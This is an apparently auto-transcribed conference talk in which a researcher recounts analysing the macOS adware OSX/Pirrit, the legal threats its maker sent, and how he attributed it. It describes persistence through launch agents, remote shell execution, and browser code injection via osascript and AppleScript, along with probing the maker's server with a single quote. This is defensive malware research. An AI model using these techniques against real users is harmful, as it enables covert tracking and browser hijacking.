How We Reverse Engineered OSX/Pirrit, Got Legal Threats and Survived

awesome okay welcome guys thank you very much for coming and uh i'm gonna share i'm gonna share a story with you about osx spirit which is for me literally the gift that keeps on giving um the obligatory who am i um as of now i am the head of security research at cybereason nocturnist which is our new uh research lab that we're building right now uh we're also hiring so uh feel free to reach out to me either here or over on twitter uh i do lots of different forms of research uh malware analysis and low level research and just like for shits for giggles i find exploits on things and then they turned out into

giant botnets and i shitpost on twitter a lot so that's my handle over there that used to be my profile picture up until pretty recently and sometimes my [ __ ] posting causes a lot of trouble so i'm i'm israeli i live in i live in boston but originally i'm israeli and i i came back from israel a couple of weeks ago i was visiting my family and when i landed i went to the quick um passport uh control thing where you put your hand in and it tells you that you can go so i literally crashed the [ __ ] thing with my hand and i took a picture and i said holy [ __ ] that's windows xp

that shouldn't run there so i put it on twitter and two days later that was a headline

so i should shitpost less i guess or more depends on how you look at it um okay let's start just gonna hold this like this okay so uh what are we talking about here so i'll give you the background and if any of you are following me on twitter i tweeted a bunch of links yesterday and said if you are coming to my talk you might want to read those links because it'll give you some of the backstory but in case you didn't i will give you a very very quick version of it so back in 2016 i was at home and i was bored and i was in irc and someone said my mac is acting really

weird anyone wants to take a look at that so i talked to that guy and said hey send me some files it ended up being a new os x adware malware for me it's it's it's always malware there's no such thing as adware um and it was um a port for mac uh of the period uh adware for windows and um i completely tore it apart and i did a bunch of write-ups on it and a bunch of talks and it's like every every month i like learned a new detail and after three months of reverse engineering this after i did my first talks um i actually found inside one of the files so the uh

the creators of this adware malware whatever you want to call it um they kept pushing updates because after i did all of my talks they started frantically changing things and in one of the versions that they pushed out the new versions they weren't careful enough and they left their first and last names um inside one of the archives and i stumbled upon it and i was like okay linkedin and one guy was the vp rnd and the other guy was just one of the programmers there and they work for an israeli company called targeting edge and after i i published another um article with like their faces blurred and i said okay i know who you are

um they took down all of their servers and they became quiet for a while and then in uh november last november i have some yara rules that i always run for stuff that i found and then in november like everything started to light up like a christmas tree all over a sudden after it was really quiet for a while i was like okay [Music] um so as i said i have a bunch of yar rules always running for things that i'm them uh doing research for and they're they're running on all like all sorts of different systems be it virustotal or our own uh product that we develop at cybereason and and i was like oh wow this is rad and as

i said i should post a lot so i i i tweeted and it took like a day and we start getting letters from their legal department now this was very personal as you can see mr amit server has been referring to our clients product on social media as malware that's because it is um no no i i'm i wanna like take the time for a second to read it because it's really funny and there's um i i worked a lot like the whole purpose of this talk is i worked a lot with our legal department on this because if you work for a company and you start to get legal threats um be it against you personally or

against the company you work for you need to work with legal otherwise you're doing it wrong um so they basically say they basically said we're not doing malware this is not malware everything is legit um i am a quote unquote expert basically they're trying to say that i'm an idiot um as you can see in the second one is the cyber security expert cyber reason considers itself as well known in clear two cyber reason that adware is not explicitly malware now they knew that the write-up was coming up because i said that it will come up on twitter um and they send us letters every day every day sometimes they send us more than one and every day they change their

narrative so they started with everything we're doing is perfectly fine and then they said we are legitimate adware and we are not malware and we are not using exploits um the product nor our client do not spy or takes over the browser the product does not collect nor store any personal aggregated or sensitive information of the user rather solely technical device data which is used in real time isn't that the same thing um the product does not nor does it attempt to exploit any device vulnerability remember this sentence um and it was developed distributed and functions according to apple's guidelines okay please note that cyber reason's claim regarding to the use of applescript we will get back to

that is redundant as such as is legal and legitimate as a feature explicitly designed for developers so does create remote thread but still a lot of malware use that so it doesn't make any sense um the product is not parrot or os x spirit please remember that sentence as explicitly as explicitly stated by our client in response to the previous report published by cyber reason blah blah blah this is not us like they're saying we have nothing to do with this in contrary to the claims detailed in the abstract our client uh is not trying to distance its activity from the period software i call [ __ ] and you'll see that as well um

from the simple reason that the product is not the period software okay and then they said and this this is like all from different letters like we got every day like we had like new reading materials and like our our legal department kept sending me slack messages oh we have another letter from them do you want to read it i'm like of course like bring on the popcorn um and then they said and then they said um uh they gave like they said in one of their letters said we're not malware here is what malware is and they gave a list of like this is how eset uh the av company um defines malware well what do you know they answer to

each one of those each one of those sentences basically describes their product the product nor our client do not spy or takes over the browser yeah so at that point i was like okay so after they realize that the report is coming because um some journalists uh talk to me before i publish this report and some some journalists actually reached out to them and they tried to get their response which was pretty difficult they realized that it's gonna that it's it's happening the report is coming up so they said okay like put this in your report like this is a sent like this is a whole blurb that they wrote to us and they said

like we demand you to put this in your report now we don't owe them [ __ ] like we don't need to put that in our report but we said okay so this ended up being in my report and in this slide and okay like did you all get a chance to read that like we highly respect the privacy of the users and completely comply with all the it's not true so they in one of the things they said here they said we have an end user license agreement well we couldn't find it anywhere like i double dare all of you to go to their websites google targeting edge end user license just do it right now there is nothing

um and their website also had a contact form and an email address which doesn't work so this is um so this is zach whitaker from zdnet who wrote about it and he sends me this screenshot so he sends them an email from so we went to their website targetingedge.com there's a contact us form and there's an email info targeting edge.com so he sends them an email hey they're reaching out for a comment regarding a new report blah blah blah blah blah blah he gets an error address not found okay so so this is like seriously this is awesome and you ain't seen [ __ ] like we're just starting um so before we start i need to tell you

um and it's another bit of history about how the old version of x period the one from almost two years ago how it worked so um adware is really popular in macs so if uh if like mac owners tell you oh look we're on mac we don't get viruses we don't get adwords we don't get pop-ups i call [ __ ] on this one directly um and adware is really popular so people go to various websites like softonic and all of those download websites and they download whatever they want to download from them it's from from that website so let's say someone wants to download vlc media player so he goes to softonic he writes

vlc media player and he gets he gets like an installer and this is how all of those adware companies work basically they're calling them uh uh installation monetization solution which is another word for like we're in your computer doing [ __ ] and you you get an installer that in that actually installs the vlc media player but then you get like herpes with that that was my analogy from two years ago which is available on youtube for your own enjoyment and those installers back then used something that's called a pre-flight script so you know that when you start the installer you get this like oh welcome to the installer of blah blah blah blah click next and this is even before you

see any end user license agreement so once you are opening the installer what's called a preflight script runs and starts like installing all of the bad stuff you'll get the vlc media player after you'll hit next but all of the bad stuff comes right when you uh right when you start the the installer before you even looked at the end user license agreement which i doubt that it tells you about all of that but whatever um so now we fast forward to last november so what i did is i started getting samples of new installers and and and basically new samples of of the new osx period and when i looked at um when i looked at

what's it doing what's going on i saw that um it sends an http request to that url now every request had a one-time like id in there like a guide that you had to that you had to supply and that the installer did because every link only worked once and i wanted to grab a bunch of samples and the sample that i got like the one that i got from the the logs that we had the id didn't work because it was already used so when everything f when everything fails apply [ __ ] that's like my life motto so i was like okay let's try to do this manually let's try to take the link

and instead of an id let's just send a quote just see what happens literally the first thing i did i got back a url from the server like i send it the i send a request with a single quote and i get a url back from the server and i was like okay let's request that url bam i get i get a huge script this is like 360 something lines i think it says so in the next slide and this is like their installation script that what that's what's running before you even like installed anything and i don't know if you can see it hold on where do i i want to zoom like if you

look it's like a word jumbo it's really it's really fun like that's my that's that's what i did for a few weeks um you have like sudo and stuff that runs as root and like all of those things are happening on your machine and you have no idea because you didn't read the end user license agreement and and you're probably asking yourself here like you see right in the middle there's a pseudo kill all osu script which is applescript which is fine um and you're probably asking yourself how do they get root privileges how can they run sudo are they using any kind of exploits of course not so um how many of you are using macs show of hands okay cool

so mo so all the people that use macs and if you don't use a mac i'm about to tell you that most installers when you run them they ask for your password the reason that they ask for your password is to elevate their privileges to elevate their privileges in in max in os x um the user that you have is by default on the sudoers list so if you enter your password it elevates itself in your route it's like doing sudo su basically so this is how they do it like their installer runs and you just ask for your password and you give it your password and it's root and then you have all of those things running in the

background is root and you can see like a lot of like it's downloading stuff from a lot of urls and we're gonna talk about that so that script is huge as i said it's 329 lines in bash that i had to go through it took me three days it's not fun and it's very similar if not almost identical to the script that i analyzed two years ago from old period which is not made by them which was already proven by me but okay um the script has many urls that it sends requests to and a lot of those urls look like dga domains do we all know what dga domains are show of hands okay so dj

domain domains are like weird and long and usually random looking domain names like q2 w e d c f z and number dot com uh those domains like you you only see that in malware like there's no reason whatsoever for like oh yeah email me like at a meet at qa295z like it doesn't make any sense and this is uh usually those domains like there's a there's a logic behind it like there's an algorithm that calculates it makes those domains and then attackers can um basically the malware generates the domains and the attackers can register the domains way after so like there will always have a domain that will connect it's basically it's very hard to uh it's

very hard to block unless you're using some sort of a endpoint solution that i happen to be working for a company that makes one and um uh and we'll see that as well now this is like um uh this is like do you know the russian uh matryoshka dolls like you open one and there's another one and there's another one this is how it works like this thing downloads like seven eight different payloads each step of the way and each payload has like a new thing that is doing now a payload can be sometimes a script and it could be a binary file that does stuff and we're gonna talk about that as well so what happens

is um that script is generating a random name like it takes um every mac has this file slash us share slash dict words and it has words in it like words from a dictionary um the the script simply there's a function called r d for random if you guys over there can see it um and it literally just picks a random word and and and saves it to a variable a random word from all of those lists and then it creates a directory in the user's home directory that's the tilde in slash library slash random name that random name is generated by that function what also is happening is that the unique id of the machine again no private data no

no nothing identifying it's fine um the unique identifier of the machine is extracted and being sent to targeting edges servers along with the path and the random name that was chosen so every time their adware legit adware as they say was installed in your machine they actually know like they can identify you by your machine's um unique identifier and where and which random word and where it was installed and if you see here these are the god damn it these are the weird domains you see here pw.09 aed5 mck3 legit yeah and it's like no it's not malware it's fine now once this data was submitted to their server the server will send you another payload

um this payload will be downloaded and a lot and a launch agent will be created for it now a launch agent in in max peak is basically an autorun um there are several kinds several types of autoruns on mac but uh the most important ones are launch agents and launch demons a launch agent will uh start when the user logs in and a launch daemon will start when the operating system boots before the user logs in so that's the difference between the two and it it creates both of them so launch agents and launch daemons and they have like five different ones of them so they will always they always have persistence and they have watchdogs that

that guard that the other launch agent still exists so it's fine it's legit um then after this launch agent is being created so as you can see it downloads right here it downloads this archive this tc.tgz and that file has a binary in it so i started looking at that binary as well i started reverse engineering it and i looked at the uh just at the names of the functions did receive response did receive data will cache response blah blah blah and then run external application that gets arguments okay so ida pro and i'll zoom in just a sec okay it calls ben sh yeah legit it calls ben sage and dennis h takes an argument so

this is percentage at so objective c which is if there are any ios or mac os programmers here wow objective c is terrible um so objective c um like what you know as percentage s from c or python is uh percentage act um in objective c sort of um so it actually calls ben sh and supplies it like you can supply an argument with it so someone on their end can run whatever he wants on your machine that's fine [Music] um so as i said it calls and it runs stuff with penis h just like a rat um it is code signed so here's an interesting thing about code signatures so all of um all of the

binaries that were dropped by the old version of period from two years ago all of them were signed and uh the interesting thing is that they were signed and the the names on the certificates were israeli and being israeli i can identify israeli names so that's not an issue and since the beginning i knew like oh that that has to be israelis because there's also a lot of israeli companies israeli ad tech companies in israel because um well we don't really have computer crimes law like it's not a thing [Music] but i didn't know that it was that company i thought i thought it was a different company um the the cool thing about two years

ago what happened is every time i found another binary i had like a script that automatically just like gives me a list every day of the new binaries and the new signers i would um i would send an email to my contact in apple and apple would revoke the certificates within 20 minutes they had a new certificate so it was insane like they had tons of them this is illegal because in order to get signatures signing certificates from apple you need to send them some sort of an id i don't think they had like 250 people working for them so those id's weren't real and that's illegal as well um but it's fine it's fine um

this payload was signed but it wasn't properly sucked it was signed with an ad hoc signature which has no meaning on mac os uh the reason is because ad hoc signatures are used to develop apps for ios now i have no idea why they did that like the the actual component in um in the operating system which is the amfi trust cache doesn't even exist in mac os my theory and i have no proof for it is that it was signed like this basically to throw off anti-viruses so they would say oh this is legit this is this is sign this is fine um and that payload also enumerated the list of running processes to check if there are any browsers

running because as we as we like we need to remember this is while it is a very malicious ad where this is still adware like the whole point of this thing is to see where you're going where you're browsing and display ads for you that were meant for you that were targeted for you like their name is targeting edge for a reason and that um that payload was constantly looking to see if you have any browsers running now that payload also installed another launch agent um using the using the name the random naming convention from before so on my testing machine it created um like the name uh created a random name roadless and that was the name of the package

okay roadless and then it downloads more payloads yay um so um inside that rgz file there were a bunch of files as you can see like there's something that's called browser enhancer that we'll talk about install updater.sage blah blah blah and protector wait protector the [ __ ] so basically to serve ads and protect their own ass protector is a binary file and it has only one purpose it wants to see that all the payloads are running and all the launch agents and launch demons are there and if they are removed for any reason they will be reinstalled so protector protects protector also sets up a launch demon with a random name however since i sort of uncovered um in my last

report how they generate the names like the name generation thing with the dictionary is not new but in order to make things different for the protector they they have an extra file called names.db as you can see here and this file has also a list of strings and it just gets like two strings from there and builds a word not really clever but it's just a different way of generating random names protectors and updaters installation script so there's another script called updater there update.sh um they're also doing another weird thing which i found odd they're removing a browser plug-in like in case you have it like they check if you have a browser plugin called omnikey

and if you do have it they just remove it again this is fine um and i didn't know what this uh what this plugin was so i started reading and apparently it's a bra it's a plugin that allows you to um you know how in chrome you go to the address bar and you just type something not an address and it googles so it's basically uh it's it's basically to create custom requests like that custom searches so you can say okay so here's the url to search in ebay and then you just do ebay space query enter and search in ebay now apparently this really screws with their malware so they just remove it all together

without telling you and this was another cool thing this is why i named the talk to da vinci code because for a while i was really curious like i called it pirate because i saw a string period in there and when i googled i saw that it's a windows adware but i was like really curious how do they name it like in there like they don't come to work and they say oh we have a new version of period coming out but luckily they suck at opsec so everything is documented as you will see so while the script is installing there's like this echo installing davinci and i'm like okay cool davinci so let's talk about browser enhancer

let's take a moment i stared at it once for three minutes until i figured out like it's [ __ ] with me you didn't realize that or i'm an idiot either or uh okay um in my previous reports when i reverse engineered their binaries i saw that they're using the the qut programming framework now if you're not familiar with qut which is actually pronounced cute so why did you write at qt i don't know um qut is uh basically a framework that allows you to write code one time and then when you're compiling it you can say oh i want to compile it to linux or mac or windows and you don't have to do like all the

adaptations um the the disadvantage the the con in this is that you get all of the qt crap bundled into your code so when i was looking at the code when i was reverse engineering it i could see like all the types like a q string and it calls up free and like it's that's the function from from qqt so again this is another thing that ties it back to them because this is looks exactly like the code they wrote but they still say that it's not them even though their names were in the [ __ ] thing okay now browser enhancer so that's a a whole bundle that's being downloaded to your mac and browser enhancer will look for

browsers in order to change their settings again we're not taking over the browsers right they're not doing it but this is exactly what it does now browser enhancer is looking for the following browsers firefox safari chrome and microsoft internet explorer on a mac what year is this but this had happened before so i actually found this like there was a uh uh i also showed it in the old report so i could find like registry strings inside code that was supposed to run on mac i have no idea what kind of wizardry was pulled in order to make this thing compile because i have no idea but okay but again like this is another another

thing that ties it back to them um so browser enhancers purpose is to literally hijack the search page of the browser a thing that they said like their attorney wrote us that they are not doing um but here it is in front of you like you can see that it's um it's tracking every cookie that you get it's hijacking your search page so if you use the search in google or bing you don't do that anymore you use a different page and they're using applescript which is something that they didn't do now i'm gonna i'm gonna talk about applescript and because it was also mentioned in their in their uh letter applescript is a scripting

language that apple made and i'm gonna talk about it and it's actually a really cool thing that you should all be scared of so this is the search page that you now have um tksearch.com very legit everybody knows that and if you look at the bottom of the page it is um copyright 2017 to babylon limited another great israeli company that does adware like do you remember the babylon translator from like ages ago yeah no yeah it's them that's what they do you think that you're translating words from japanese no okay so every time it's like okay cool this payload does that i i wrote so this is this presentation doesn't have all the details if you're really

interested you should read the full report on our blog it's like almost 30 pages long because it has more and more and more payloads and at that point i was like okay you're threatening me that's cool let's dance i'm down i'll write 30 pages just to [ __ ] back with you um so once browser enhance enhancer is finished running it will execute another post installation script called post install.sh how lovely and it downloads another payload and it downloads a binary this time that's called macver i have no idea what it stands for uh macver will be renamed to yet another randomly generated name using the old method that i showed you before and after that it will create

a file called com.application.plist and it will put it in uh tilde like your home directory library slash uh preferences so this directory on mac which exists in every one of your home directories um has a lot of preferences like the distance of the icons in your dock and like all sorts of all sorts of os preferences now if you'll create a file called com.application.plist in there you'll think that it's perfectly legit and it's fine like you won't think that it's something malicious unless you know you know what you're doing and again they say like we're not trying to hide ourself everything is fine everything is documented we're legit yeah um now if we look at the um if we look at the

browser at the browser post install script um it changes a bunch of things and it also adds a bunch of things to the um to the mac equivalent of the registry so uh the bottom the bottom screenshot is actually what you can see is um it actually says if you go to google then send it send the user to a different page like the loadingpages.info thing and it sends the id of your machine back to them like right here so if you used to use google then you don't use it anymore but they know that you wanted to go to google and they have the unique identifier of your machine again now let's break apart macwa a little bit

more so as i said this is not a script it is actually a 64-bit uh mach 0 executable mach 0 is the executable format in max windows has pes linux has elves mac has mock o because they have to be different and unlike all of the other executables it doesn't import um any qut resources which was refreshing for a change because this was actually a little bit different when i looked at the string sections i saw a bunch of base64 stuff now we're all intelligent enough to know that base64 is super secure like if you want to hide something if you want to encrypt something you encrypt it in base64. so i get a lot

of dms on twitter like teach me how to hacks bro so first like pro bono always encrypt with base64 so i'm very good at what i do so i de-obfuscated the base64 which was a challenge [Music] um and there was a lot of apple script code in there like all of this base64 stuff was applescript now let's talk about applescript for a sec so applescript is actually a scripting language that was created by apple and it was created for automation purposes and applescript goes way back like it's an old language and it actually has a really cool syntax like the syntax of applescript is english like tell application google chrome to do something like that's the actual syntax

if your machine is running in french it'll be in french it's pretty rad and the whole point of applescript was to automate tasks in another processes so let's say that you need to like run sort of a batch operation like you have an application that i don't know converts video but it can only converts one file at a time apple basically said hey the correct way of running of writing programs to mac os is you should create um an uh an applescript api for every program that you make so if you want to fully compliant if you want to fully comply with apple's guidelines then your program should have um like a third-party api with

applescript so you could like tell video encoder to select all files from this directory and click the button that says submit i don't know like just an example so when you think about it it's basically code injection and you don't have to be privileged so if in windows sometimes you have to be privileged in order to get a handle to a remote process and inject a dll to that process that does something you want to do you don't need that in apple you basically write applescript and you don't need to elevate yourself so yo dog i heard you like code injections so we used applescript to inject code that injects out javascript so basically what they're doing with all

of that applescript code is they're finding out which browser is running so you can see like if is safari running then tell application safari to set page source to do javascript and then just a whole bunch of javascript to it so you don't even know it and you're running chrome you're running firefox you're running safari or you're a wizard and you're running microsoft internet explorer on a mac yeah if you can make it happen i want to talk to you no not with wine natively that supports applescript um i know wine

been doing this for like a year um so um so you don't even know it and you think that your browser is like super secure and like yeah i'm using chrome and chrome and like google cares about security or firefox cares about security or safari or microsoft internet explorer um but you actually have code that's being actively injected all the time into your browser so basically every page that you visit every site that you go to every query that you sent in whatever side that you go to like if you go to the source you'll all you all of a sudden see like javascript that's not supposed to be there and it was injected there

via code injection which is completely fine in in like apple's world like here is another example in chrome tell application google chrome to tell active tab of window 1 to set source html to execute javascript it's it's fine this is fine so this is basically what's happening behind the scenes so you have mac ver which is there like malicious binary that's running on your machine and here is the interesting thing so there are there are ways of doing stuff um in us in a stealthy fashion they don't believe in that so they basically just uh do like system and then they call an application it's called osa script and osuscript is the applescript interpreter so they basically so you can you can run

in your mac you can do like osuscript hyphen hyphen help and see like what it does but you can do like osuscript space hyphen i think it's d and then open quotes and just give it a bunch of and what will happen is that you will always see a process called osa script doing stuff now the because it's a command line argument so if you have like any um advanced endpoint protection system like the one that we're making for example um you'll be able to see it it's fairly easy like if you'll enable even the most simple auditing tools that are even like some of them are built into macos you'll be able to see like also script and all

the things that it does so basically osa script sends uh javascript to google chrome and it also asks google chrome hey what url are you currently visiting what site is currently open and it gets it and according to that uh according to that site it will send it more javascript so you could see things like like and i think i have a screenshot of that later on i was basically going to google and i wrote anti-virus and i hit enter so uh it gave me a bunch of results and then it opened a pop-up for um an anti-virus company that's completely legit like no seriously completely legit so i wonder like who spends money on

advertising there and if they know that they're actually advertising through these nefarious um ways now something about the old version of period so this was actually a very refreshing change old version the old version of period and i talked about like the talk is on youtube you can find it um the old version of period actually downloaded and installed a proxy server that ran on your machine it's reconfigured through the firewall that every http request will go through with the proxy that runs on your machine and the proxy would plant all the ads and do all this [ __ ] now since it's it's super easy to block it and since i literally told every av

company in the world how to do it they don't do it anymore so they reverted to applescript which is actually pretty clever because they're using the operating systems tools against itself osuscript is a legit apple binary it's signed by apple like it's it's fine um but yet you can use it to inject malicious code into browsers without like without doing anything crazy all you have to do is speak english or french so this is what they did with um with applescript the major caveat of that is that it's super slow because the process that thing if we go back that loop happens every second so your browser is pulled every second and every second it injects

code to it and sometimes if the timing isn't right if the code is being injected like right when the thread in the browser is loading the pager to your visit you're visiting your browser will totally crap up it will either crash or it'll start do weird things like half loading a page and telling you it's done so and it also it's really slow it's really slow in your machine so if you work on your mac and like you have weird stuff like this happening to you check which processes are running see if osu script is running check it for time to time like if if you're in an organization and you have some sort of system

where you can query all the running processes and you know all across your organization look for osuscript like a lot of attackers are using it you can you can you can um use osu script and like people are doing it if you know if you know this on uh this on twitter dan tentler he did this whole talk on how he abused this guy's mac like as a part of an engagement i think it was a reporter how he did all sorts of crazy [ __ ] just with applescript and all he did is use ozoscript so it's also very easy to detect if you know what you're looking for um i think i talked about that

um so as i said they're really good at opsec right so you can actually run mac ver and debug mode and you'll get all the output so here's a nice example so i i went to google i wrote error right so you can see and this like runs every second and and you can see that it got the full url of what i was looking for here's the query right and then it said okay let me give you like let's let me give you this ad that served from loading pages dot info and here's a javascript and here's my identifier of my machine so they know exactly who i am even though they say they don't

here's the address https google blah blah blah and then i got an ad for a fake av this time that's called mac keeper any of you heard about mac mackeeper show of hands okay so mackeeper wow that would be awesome if i will get sued by them as well um mackeeper are like if you'll google them you'll see that something isn't really linked straight in there um they actually hired a guy who i won't say i won't say his name and they were used to release report and the report said the mackeeper security research center um they're basically their whole point is selling you a fake av like they're infecting you and then they're saying oh like we're the only

one that can remove osx spirit from your machine buy our av and then you buy their av and you get aids so and there's there's a market like mackeeper and they were sued and there was a kill like it's all in google like i'm not making it up um so you get ads for them and you got all sorts of weird ads so like here you can see i have a screenshot i remembered um i googled error and then like i had this tab opening attention clean your mac [Music] virus scan is recommended for max it's also recommended for humans i think if you go to like to get your physicals kids um so this is how basically things are

working now let's talk about attribution because at the beginning i said like the reason why targeting edge started sending me uh like threat letters was i wrote on twitter the idiots from targeting edge are at it again and they didn't like it so when i found out who they are it was actually because it was super lazy and it's in one of my reports so um i downloaded another one of their payloads and um i think my vm was acting up and i didn't want to open it on my machine i didn't want to unpack the bind the archive on on my machine so i said okay i just want to see which files are in there so

uh it was it was a tar archive so with tar you can just list the files that are in the tar without extracting them it's basically like doing a an ls inside the tar now the cool thing and i didn't even think about that back then because of the fact that tar is a post-6 file format when you when you create a tar archive it will create a tar archive and inside the tar archive it'll save the original ownership metadata of the file inside the tarball and where it says now batman staff it had the names of like their vp r d and one of their devs because who thought about it right so they

actually developed it on their own machine like the full name like first name and last name was their username so again because i told everyone that that's how they do it they now change it to batman however all the names of the files are the same now even though that in all of their letters they insisted that they have absolutely nothing to do with osx spirit like they have nothing to do when they said you shamed us on stage we have nothing to do with this um you uh you smeared targeting edge's fine name and i was saying your names were in there like i'm not lying but the thing is that i can do this attribution again mainly

for two reasons one i've done this before and the way that i found them with like all the er rules and stuff i didn't put everything in my reports i saved some for myself because i like opsec and now i have a pretty good knowledge of their like coding style and ttps and whatever so what do we have so far we have code that looks almost identical to the code from two years ago right we have methods the scripts the names of things the servers the way that everything like ties together and it's almost identical to my findings from two years ago and we also have frantic letters from their attorneys telling us that it's not them

which is obviously [ __ ] but they're telling us this is not us and don't publish anything that's related to our intellectual property all of this if anyone follows me on twitter i had like a crazy thing with her like two weeks ago um now with all of this this is not really proof so what is proof so let's talk about domains right so when targeting edge are buying their domains they usually buy them in batches of eight or ten like that's what i saw on on threat crowd but there was one batch where they didn't pay the extra whatever dollars for the domain privacy so there were a bunch of domains that were all linked

to an ip address because it was different domains tied to the same server and those domains were registered by the name of the ceo at targetingedge.com it's not them right so if you do a simple whois you see that the admin organization is targeting edge and the admin name is literally their ceo and like here's their office address which is actually not really far from our own office in tel aviv [Music] but we also have a resume of their employee who really liked my report and wanted to work for us and in his resume he said my work appeared in cybereason labs report in itnew.com article you can't make this [ __ ] up seriously

seriously wow the letter that i'm gonna get in a few days oh boy um now here's the funny thing remember that we don't use any exploits and it's all fine if you click the link of the second one the itnew.com article you get this one of their adware not period another one exploited uh the well-known now not zero day anymore root pipe exploit in os x we're not using any exploits their own employee literally wrote that on his resume [Music] i don't know what to tell you guys and basically that wraps everything up [Music] so [Applause] before before i take questions if you guys are have because you guys have them because we wrapped up

nine minutes uh before time is up i need to take a selfie with you all yay okay fomo okay so um just a few words um i couldn't do all of this and i couldn't stand on the stage and like talk in in in in like being so calm and basically just [ __ ] posting live on stage on this company if if it weren't for our legal department who worked with me and this was like a thing that we did together i said with one of our i said with one of our um corporate counsels and like we were together on this and every letter that they sent us we had to address like every letter

everything every word that was on this letter i had to sit down with our attorney that is not a technical guy like he is technical to a certain level right he doesn't know how to reverse engineer code and i had to sit with him with ida pro and telling him here you see here they say that they don't do that here they're doing that right here so if you end up being in a case where you reverse engineer something and you're doing research and you're starting to get threat letters don't act on your own don't be a hero don't say oh [ __ ] them i can do everything by myself because you have to

have a guy that knows the law that works with you a guy or a girl someone right inclusion um it's not funny um you have to have someone that knows uh that knows what he's doing or what she's doing wow we don't have this problem in hebrew um no i'm i'm i like everyone i'm fine believe me um so this is super important like if you end up getting legal threats and it's not the first case where adware companies send legal threat letters to researchers i think it's just the funniest one and i'm sure that i'm going to run into them again because my yara rules are still uh working and you know what even though

after all of that happened they're still like doing their thing like people still get infected like after my my old research they were quiet for a while and they got back and it's in and now they have lawyers which they didn't have before so this is nuts um and yeah and if you're interested in all of that and you want to get to the more technical um aspects feel free like you're all welcome to read the report on the cyber reason blog it's super long and super detailed i couldn't cram all the information into into this uh deck because i also had to tell the story which is really fun um and any of you have any questions

those are essentially burner domains right they have to keep on setting those up

domains are actually like small change domain you can get a domain for six bucks for two years or a year it doesn't matter like it doesn't domains are a small change like when they used to do the apple certificates every certificate is 99 and it's 99 it's not only 99 dollars like you have to give them an excuse and why do you want this certificate and um you have to send them like photo id and stuff and they someone needs to work like there's a graphic designer there that probably just like generates passports or something super illegal um so i honestly like and i was talking about with uh with our legal um department like how do they make

money like running such an operation all the servers hiring devs like all of this it costs money i guess they're making money like i i honestly like this is this is expensive this is not it's not like you know it's not like running a giant mega corp like it's not that expensive but it's not cheap so i honestly don't know how do they make a profit out of this but i guess they do

[ __ ] no when when i when i got his resume so it was uh february of last year i went to meet my family in london i landed in boston i turn on my phone the recruiter from tel aviv sends me an email you gotta see this like that was the subject usually that's things i don't click on and um it was the guy resume it was that guy's resume and i was like what the [ __ ] who does that and um the answer is no he however i checked a while ago i don't know i checked like eight months ago he works at a security company

um so with the first version of pirot i wrote a bunch of removal scripts um and i put them on my on my own github but the problem was that every time like they they released a new version every day because it was actually effective because the first period was like an outbreak um and i couldn't keep up like i can't like reverse engineer this malware every day because i have other things to do so what i did is um i shared it with a bunch of colleagues from other companies and like back then we didn't have like today we have an antivirus like an nga v because of course um back then we didn't

have it so actually other uh companies i think malwarebytes put in the signature in their in their product and then it became a thing and then it um the iocs were in alien vault so other av companies just started basing their signatures off of that so um every i think that with period every av that's up to date will remove it now because of that after that thing happened the same thing i did i did the same thing yeah time's up okay if anyone wants to ask me questions i'm outside thank you very much you